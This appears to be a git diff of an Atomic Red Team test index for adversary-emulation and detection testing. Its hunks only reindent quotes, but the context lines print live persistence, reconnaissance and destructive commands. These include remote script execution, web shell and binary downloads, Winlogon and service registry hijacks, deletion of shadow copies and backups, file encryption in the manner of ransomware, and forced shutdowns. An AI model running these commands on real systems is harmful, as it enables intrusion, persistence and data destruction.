         cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
           >$null 2>&1
 
-          '
+'
     - name: Task Scheduler via VBA
       auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
       description: |
@@ -45325,7 +45325,7 @@ persistence:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-          '
+'
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -45336,7 +45336,7 @@ persistence:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-          '
+'
       executor:
         command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
           (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -45349,7 +45349,7 @@ persistence:
         login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing
         as Register-ScheduledTask cmdlet behind the scenes.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -45361,7 +45361,7 @@ persistence:
         cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false
           >$null 2>&1
 
-          '
+'
   T1053:
     technique:
       id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
@@ -45497,7 +45497,7 @@ persistence:
         sets it as the screensaver so it will execute for persistence. Requires a
         reboot and logon.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -45807,7 +45807,7 @@ persistence:
       description: 'Change Service registry ImagePath of a bengin service to a malicious
         file
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -45827,22 +45827,22 @@ persistence:
       dependencies:
       - description: 'The service must exist (#{weak_service_name})
 
-          '
+'
         prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
           1}
 
-          '
+'
         get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
 
-          '
+'
       executor:
         command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
           /f /v ImagePath /d "#{malicious_service_path}"
 
-          '
+'
         cleanup_command: 'sc.exe delete #{weak_service_name}
 
-          '
+'
         name: command_prompt
   T1547.009:
     technique:
@@ -45915,7 +45915,7 @@ persistence:
           #{shortcut_file_path}
         cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1
 
-          '
+'
         name: command_prompt
     - name: Create shortcut to cmd in startup folders
       auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2
@@ -46016,10 +46016,10 @@ persistence:
       executor:
         command: 'sudo touch /Library/StartupItems/EvilStartup.plist
 
-          '
+'
         cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
 
-          '
+'
         name: sh
         elevation_required: true
   T1542.001:
@@ -46196,7 +46196,7 @@ persistence:
       description: 'This test creates a Systemd service unit file and enables it as
         a service.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -46269,15 +46269,15 @@ persistence:
       dependencies:
       - description: 'System must be Ubuntu ,Kali OR CentOS.
 
-          '
+'
         prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
           /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
           ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
 
-          '
+'
         get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
 
-          '
+'
       executor:
         name: bash
         elevation_required: true
@@ -46714,13 +46714,13 @@ persistence:
       dependencies:
       - description: 'Microsoft Exchange SnapIn must be installed
 
-          '
+'
         prereq_command: 'Get-TransportAgent -TransportService FrontEnd
 
-          '
+'
         get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn
 
-          '
+'
       executor:
         command: |
           Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path}
@@ -46932,7 +46932,7 @@ persistence:
       auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f
       description: 'Adds a command to the .bash_profile file of the current user
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -46944,13 +46944,13 @@ persistence:
       executor:
         command: 'echo "#{command_to_add}" >> ~/.bash_profile
 
-          '
+'
         name: sh
     - name: Add command to .bashrc
       auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
       description: 'Adds a command to the .bashrc file of the current user
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -46962,7 +46962,7 @@ persistence:
       executor:
         command: 'echo "#{command_to_add}" >> ~/.bashrc
 
-          '
+'
         name: sh
   T1078:
     technique:
@@ -47131,10 +47131,10 @@ persistence:
       dependencies:
       - description: 'Web shell must exist on disk at specified location (#{web_shells})
 
-          '
+'
         prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
@@ -47143,7 +47143,7 @@ persistence:
       executor:
         command: 'xcopy /I /Y #{web_shells} #{web_shell_path}
 
-          '
+'
         cleanup_command: |
           del #{web_shell_path}\b.jsp /q >nul 2>&1
           del #{web_shell_path}\tests.jsp /q >nul 2>&1
@@ -47416,10 +47416,10 @@ persistence:
       dependencies:
       - description: 'Service binary must exist on disk at specified location (#{binary_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
@@ -47452,10 +47452,10 @@ persistence:
       dependencies:
       - description: 'Service binary must exist on disk at specified location (#{binary_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
@@ -47551,11 +47551,11 @@ persistence:
         command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
           "Shell" "explorer.exe, #{binary_to_execute}" -Force
 
-          '
+'
         cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
           NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Winlogon Userinit Key Persistence - PowerShell
       auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb
@@ -47574,11 +47574,11 @@ persistence:
         command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
           "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
 
-          '
+'
         cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
           NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
     - name: Winlogon Notify Key Logon Persistence - PowerShell
       auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9
@@ -47600,7 +47600,7 @@ persistence:
         cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
           -Force -ErrorAction Ignore
 
-          '
+'
         name: powershell
   T1547.013:
     technique:
@@ -47744,7 +47744,7 @@ impact:
           net.exe user #{user_account} #{new_password}
         cleanup_command: 'net.exe user #{user_account} /delete >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Delete User - Windows
@@ -47752,7 +47752,7 @@ impact:
       description: 'Deletes a user account to prevent access. Upon execution, run
         the command "net user" to verify that the new "AtomicUser" account was deleted.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -47774,21 +47774,21 @@ impact:
       auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947
       description: 'This test will remove an account from the domain admins group
 
-        '
+'
       supported_platforms:
       - windows
       dependency_executor_name: powershell
       dependencies:
       - description: 'Requires the Active Directory module for powershell to be installed.
 
-          '
+'
         prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit
           0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
 
-          '
+'
       input_arguments:
         super_user:
           description: Account used to run the execution command (must include domain).
@@ -48032,10 +48032,10 @@ impact:
       - description: 'Secure delete tool from Sysinternals must exist on disk at specified
           location (#{sdelete_exe})
 
-          '
+'
         prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
           Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
@@ -48065,7 +48065,7 @@ impact:
       executor:
         command: 'dd of=#{file_to_overwrite} if=#{overwrite_source}
 
-          '
+'
         name: bash
   T1486:
     technique:
@@ -48145,7 +48145,7 @@ impact:
       auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765
       description: 'Uses gpg to encrypt a file
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -48169,10 +48169,10 @@ impact:
       dependencies:
       - description: 'Finds where gpg is located
 
-          '
+'
         prereq_command: 'which_gpg=`which gpg`
 
-          '
+'
         get_prereq_command: ''
       executor:
         name: bash
@@ -48180,15 +48180,15 @@ impact:
         command: 'echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd
           0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}
 
-          '
+'
         cleanup_command: 'rm #{encrypted_file_path}
 
-          '
+'
     - name: Encrypt files using 7z (Linux)
       auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad
       description: 'Uses 7z to encrypt a file
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -48208,10 +48208,10 @@ impact:
       dependencies:
       - description: 'Finds where 7z is located
 
-          '
+'
         prereq_command: 'which_7z=`which 7z`
 
-          '
+'
         get_prereq_command: ''
       executor:
         name: bash
@@ -48226,7 +48226,7 @@ impact:
         an inturruption authentication to target system. If root permissions are not
         available then attempts to encrypt data within user''s home directory.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -48253,7 +48253,7 @@ impact:
       - description: 'Finds where ccencrypt and ccdecrypt is located and copies input
           file
 
-          '
+'
         prereq_command: |
           which_ccencrypt=`which ccencrypt`
           which_ccdecrypt=`which ccdecrypt`
@@ -48267,14 +48267,14 @@ impact:
           #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command};
           fi
 
-          '
+'
         cleanup_command: "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path};
           else cp #{cped_file_path} #{user_input_file_path}; fi \n"
     - name: Encrypt files using openssl (Linux)
       auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1
       description: 'Uses openssl to encrypt a file
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -48302,10 +48302,10 @@ impact:
       dependencies:
       - description: 'Finds where openssl is located
 
-          '
+'
         prereq_command: 'which_openssl=`which openssl`
 
-          '
+'
         get_prereq_command: ''
       executor:
         name: bash
@@ -48328,10 +48328,10 @@ impact:
         elevation_required: true
         command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
 
-          '
+'
         cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1
 
-          '
+'
   T1565:
     technique:
       external_references:
@@ -48982,18 +48982,18 @@ impact:
       - description: 'Create volume shadow copy of C:\ . This prereq command only
           works on Windows Server or Windows 8.
 
-          '
+'
         prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found
           that satisfy the query.")) { exit 0 } else { exit 1 }
 
-          '
+'
         get_prereq_command: 'vssadmin.exe create shadow /for=c:
 
-          '
+'
       executor:
         command: 'vssadmin.exe delete shadows /all /quiet
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Windows - Delete Volume Shadow Copies via WMI
@@ -49006,7 +49006,7 @@ impact:
       executor:
         command: 'wmic.exe shadowcopy delete
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Windows - wbadmin Delete Windows Backup Catalog
@@ -49019,7 +49019,7 @@ impact:
       executor:
         command: 'wbadmin delete catalog -quiet
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Windows - Disable Windows Recovery Console Repair
@@ -49050,7 +49050,7 @@ impact:
       executor:
         command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
 
-          '
+'
         name: powershell
         elevation_required: true
     - name: Windows - Delete Backup Files
@@ -49064,7 +49064,7 @@ impact:
         command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
           c:\backup*.* c:\*.set c:\*.win c:\*.dsk
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Windows - wbadmin Delete systemstatebackup
@@ -49073,13 +49073,13 @@ impact:
         technique is used by numerous ransomware families. This may only be successful
         on server platforms that have Windows Backup enabled.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'wbadmin delete systemstatebackup -keepVersions:0
 
-          '
+'
         name: command_prompt
         elevation_required: true
   T1491.001:
@@ -49141,7 +49141,7 @@ impact:
       auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3
       description: 'Downloads an image from a URL and sets it as the desktop wallpaper.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -49508,7 +49508,7 @@ impact:
       executor:
         command: 'yes > /dev/null
 
-          '
+'
         name: bash
   T1565.003:
     technique:
@@ -49726,10 +49726,10 @@ impact:
       executor:
         command: 'sc.exe stop #{service_name}
 
-          '
+'
         cleanup_command: 'sc.exe start #{service_name} >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Windows - Stop service using net.exe
@@ -49748,10 +49748,10 @@ impact:
       executor:
         command: 'net.exe stop #{service_name}
 
-          '
+'
         cleanup_command: 'net.exe start #{service_name} >nul 2>&1
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Windows - Stop service by killing process
@@ -49771,7 +49771,7 @@ impact:
       executor:
         command: 'taskkill.exe /f /im #{process_name}
 
-          '
+'
         name: command_prompt
   T1565.001:
     technique:
@@ -49882,7 +49882,7 @@ impact:
       auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64
       description: 'This test shuts down a Windows system.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -49893,14 +49893,14 @@ impact:
       executor:
         command: 'shutdown /s /t #{timeout}
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Restart System - Windows
       auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302
       description: 'This test restarts a Windows system.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -49911,14 +49911,14 @@ impact:
       executor:
         command: 'shutdown /r /t #{timeout}
 
-          '
+'
         name: command_prompt
         elevation_required: true
     - name: Restart System via `shutdown` - macOS/Linux
       auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb
       description: 'This test restarts a macOS/Linux system.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -49930,14 +49930,14 @@ impact:
       executor:
         command: 'shutdown -r #{timeout}
 
-          '
+'
         name: bash
         elevation_required: true
     - name: Shutdown System via `shutdown` - macOS/Linux
       auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de
       description: 'This test shuts down a macOS/Linux system using a halt.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
@@ -49949,73 +49949,73 @@ impact:
       executor:
         command: 'shutdown -h #{timeout}
 
-          '
+'
         name: bash
         elevation_required: true
     - name: Restart System via `reboot` - macOS/Linux
       auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027
       description: 'This test restarts a macOS/Linux system via `reboot`.
 
-        '
+'
       supported_platforms:
       - macos
       - linux
       executor:
         command: 'reboot
 
-          '
+'
         name: bash
         elevation_required: true
     - name: Shutdown System via `halt` - Linux
       auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd
       description: 'This test shuts down a Linux system using `halt`.
 
-        '
+'
       supported_platforms:
       - linux
       executor:
         command: 'halt -p
 
-          '
+'
         name: bash
         elevation_required: true
     - name: Reboot System via `halt` - Linux
       auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e
       description: 'This test restarts a Linux system using `halt`.
 
-        '
+'
       supported_platforms:
       - linux
       executor:
         command: 'halt --reboot
 
-          '
+'
         name: bash
         elevation_required: true
     - name: Shutdown System via `poweroff` - Linux
       auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa
       description: 'This test shuts down a Linux system using `poweroff`.
 
-        '
+'
       supported_platforms:
       - linux
       executor:
         command: 'poweroff
 
-          '
+'
         name: bash
         elevation_required: true
     - name: Reboot System via `poweroff` - Linux
       auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41
       description: 'This test restarts a Linux system using `poweroff`.
 
-        '
+'
       supported_platforms:
       - linux
       executor:
         command: 'poweroff --reboot
 
-          '
+'
         name: bash
         elevation_required: true
   T1565.002:
@@ -50186,10 +50186,10 @@ discovery:
       dependencies:
       - description: 'T1010.cs must exist on disk at specified location (#{input_source_code})
 
-          '
+'
         prereq_command: 'if (Test-Path #{input_source_code}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}"
@@ -50199,7 +50199,7 @@ discovery:
           #{output_file_name}
         cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1
 
-          '
+'
         name: command_prompt
   T1217:
     technique:
@@ -50249,7 +50249,7 @@ discovery:
       description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions)
         that contains bookmarks and lists any found instances to a text file.
 
-        '
+'
       supported_platforms:
       - linux
       input_arguments:
@@ -50263,14 +50263,14 @@ discovery:
           cat #{output_file} 2>/dev/null
         cleanup_command: 'rm -f #{output_file} 2>/dev/null
 
-          '
+'
         name: sh
     - name: List Mozilla Firefox Bookmark Database Files on macOS
       auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b
       description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS)
         that contains bookmarks and lists any found instances to a text file.
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -50284,14 +50284,14 @@ discovery:
           cat #{output_file} 2>/dev/null
         cleanup_command: 'rm -f #{output_file} 2>/dev/null
 
-          '
+'
         name: sh
     - name: List Google Chrome Bookmark JSON Files on macOS
       auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc
       description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains
         bookmarks in JSON format and lists any found instances to a text file.
 
-        '
+'
       supported_platforms:
       - macos
       input_arguments:
@@ -50305,7 +50305,7 @@ discovery:
           cat #{output_file} 2>/dev/null
         cleanup_command: 'rm -f #{output_file} 2>/dev/null
 
-          '
+'
         name: sh
     - name: List Google Chrome Bookmarks on Windows with powershell
       auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545
@@ -50318,7 +50318,7 @@ discovery:
         command: 'Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction
           SilentlyContinue -Force
 
-          '
+'
         name: powershell
     - name: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt
       auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5
@@ -50330,7 +50330,7 @@ discovery:
       executor:
         command: 'where /R C:\Users\ Bookmarks
 
-          '
+'
         name: command_prompt
     - name: List Mozilla Firefox bookmarks on Windows with command prompt
       auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5
@@ -50342,7 +50342,7 @@ discovery:
       executor:
         command: 'where /R C:\Users\ places.sqlite
 
-          '
+'
         name: command_prompt
     - name: List Internet Explorer Bookmarks using the command prompt
       auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85
@@ -50353,7 +50353,7 @@ discovery:
       executor:
         command: 'dir /s /b %USERPROFILE%\Favorites
 
-          '
+'
         name: command_prompt
   T1087.004:
     technique:
@@ -50800,7 +50800,7 @@ discovery:
       description: 'Enumerate all accounts via PowerShell. Upon execution, lots of
         user account and group information will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -50814,7 +50814,7 @@ discovery:
       description: 'Enumerate logged on users. Upon exeuction, logged on users will
         be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -50825,7 +50825,7 @@ discovery:
       executor:
         command: 'query user /SERVER:#{computer_name}
 
-          '
+'
         name: command_prompt
     - name: Automated AD Recon (ADRecon)
       auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59
@@ -50843,18 +50843,18 @@ discovery:
       dependencies:
       - description: 'ADRecon must exist on disk at specified location (#{adrecon_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{adrecon_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1"
           -OutFile #{adrecon_path}
 
-          '
+'
       executor:
         command: 'Invoke-Expression #{adrecon_path}
 
-          '
+'
         cleanup_command: |
           Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null
           Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse
@@ -50875,14 +50875,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-          '
+'
       executor:
         command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold
           lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength
@@ -50904,14 +50904,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-          '
+'
       executor:
         command: "#{adfind_path} -sc admincountdmp\n"
         name: command_prompt
@@ -50931,14 +50931,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-          '
+'
       executor:
         command: "#{adfind_path} -f (objectcategory=person)\n"
         name: command_prompt
@@ -50958,14 +50958,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-          '
+'
       executor:
         command: "#{adfind_path} -sc exchaddresses\n"
         name: command_prompt
@@ -50974,13 +50974,13 @@ discovery:
       description: 'This test will enumerate the details of the built-in domain admin
         account
 
-        '
+'
       supported_platforms:
       - windows
       executor:
         command: 'net user administrator /domain
 
-          '
+'
         name: command_prompt
     - name: Enumerate Active Directory for Unconstrained Delegation
       auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
@@ -51003,7 +51003,7 @@ discovery:
       dependencies:
       - description: 'PowerShell ActiveDirectory Module must be installed
 
-          '
+'
         prereq_command: |
           Try {
               Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
@@ -51024,7 +51024,7 @@ discovery:
         command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})''
           -Server #{domain}
 
-          '
+'
   T1069.002:
     technique:
       external_references:
@@ -51092,7 +51092,7 @@ discovery:
       executor:
         command: 'get-ADPrincipalGroupMembership #{user} | select name
 
-          '
+'
         name: powershell
     - name: Elevated group enumeration using net group (Domain)
       auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37
@@ -51114,7 +51114,7 @@ discovery:
         execution, progress and info about each host in the domain being scanned will
         be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -51128,7 +51128,7 @@ discovery:
         machines in the domain. Upon execution, information about each machine will
         be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       executor:
@@ -51141,7 +51141,7 @@ discovery:
       description: 'takes a computer and determines who has admin rights over it through
         GPO enumeration. Upon execution, information about the machine will be displayed.
 
-        '
+'
       supported_platforms:
       - windows
       input_arguments:
@@ -51159,39 +51159,39 @@ discovery:
       description: 'When successful, accounts that do not require kerberos pre-auth
         will be returned
 
-        '
+'
       supported_platforms:
       - windows
       dependency_executor_name: powershell
       dependencies:
       - description: 'Computer must be domain joined.
 
-          '
+'
         prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
           {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Write-Host Joining this computer to a domain must be
           done manually.
 
-          '
+'
       - description: 'Requires the Active Directory module for powershell to be installed.
 
-          '
+'
         prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit
           0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
 
-          '
+'
       executor:
         name: powershell
         elevation_required: false
         command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth
           -eq $TRUE}
 
-          '
+'
     - name: Adfind - Query Active Directory Groups
       auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274
       description: |
@@ -51208,10 +51208,10 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
@@ -51301,7 +51301,7 @@ discovery:
       executor:
         command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr *
 
-          '
+'
         name: command_prompt
     - name: Windows - Discover domain trusts with nltest
       auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe
@@ -51314,17 +51314,17 @@ discovery:
       dependencies:
       - description: 'nltest.exe from RSAT must be present on disk
 
-          '
+'
         prereq_command: 'WHERE nltest.exe >NUL 2>&1
 
-          '
+'
         get_prereq_command: 'echo Sorry RSAT must be installed manually
 
-          '
+'
       executor:
         command: 'nltest /domain_trusts
 
-          '
+'
         name: command_prompt
     - name: Powershell enumerate domains and forests
       auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30
@@ -51337,26 +51337,26 @@ discovery:
       dependencies:
       - description: 'PowerView PowerShell script must exist on disk
 
-          '
+'
         prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit
           1}
 
-          '
+'
         get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1"
           -OutFile "$env:TEMP\PowerView.ps1"
 
-          '
+'
       - description: 'RSAT PowerShell AD admin cmdlets must be installed
 
-          '
+'
         prereq_command: 'if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And
           (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else {
           exit 1 }
 
-          '
+'
         get_prereq_command: 'Write-Host "Sorry RSAT must be installed manually"
 
-          '
+'
       executor:
         command: |
           Import-Module "$env:TEMP\PowerView.ps1"
@@ -51381,14 +51381,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-          '
+'
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-          '
+'
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-          '
+'
       executor:
